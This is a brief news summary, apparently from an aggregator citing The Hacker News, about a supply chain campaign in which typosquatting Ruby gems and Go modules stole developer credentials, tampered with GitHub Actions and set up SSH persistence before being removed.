"The Ruby gems are designed to automate credential theft during install time, harvesting environment variables, SSH keys, AWS secrets, .npmrc, .netrc, GitHub CLI configuration, and RubyGems credentials. The stolen data is then exfiltrated to an attacker-controlled Webhook[.]site endpoint."
"The account is part of a software supply chain campaign targeting developers, CI runners, and build environments across two ecosystems, according to Socket security researcher Kirill Boychenko."
"The identified packages masquerade as recognizable and well-known modules like activesupport-logger, devise-jwt, go-retryablehttp, grpc-client, and config-loader so as to evade detection and trick users into downloading them."
A new software supply chain attack campaign has been identified, utilizing sleeper packages to deliver malicious payloads. These payloads enable credential theft, GitHub Actions tampering, and SSH persistence. The campaign is linked to the GitHub account 'BufferZoneCorp,' which published malicious Ruby gems and Go modules. The Ruby gems automate credential theft during installation, while the Go modules possess broader capabilities. The malicious packages have been removed from RubyGems and blocked in Go, but they were designed to mimic well-known modules to evade detection.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]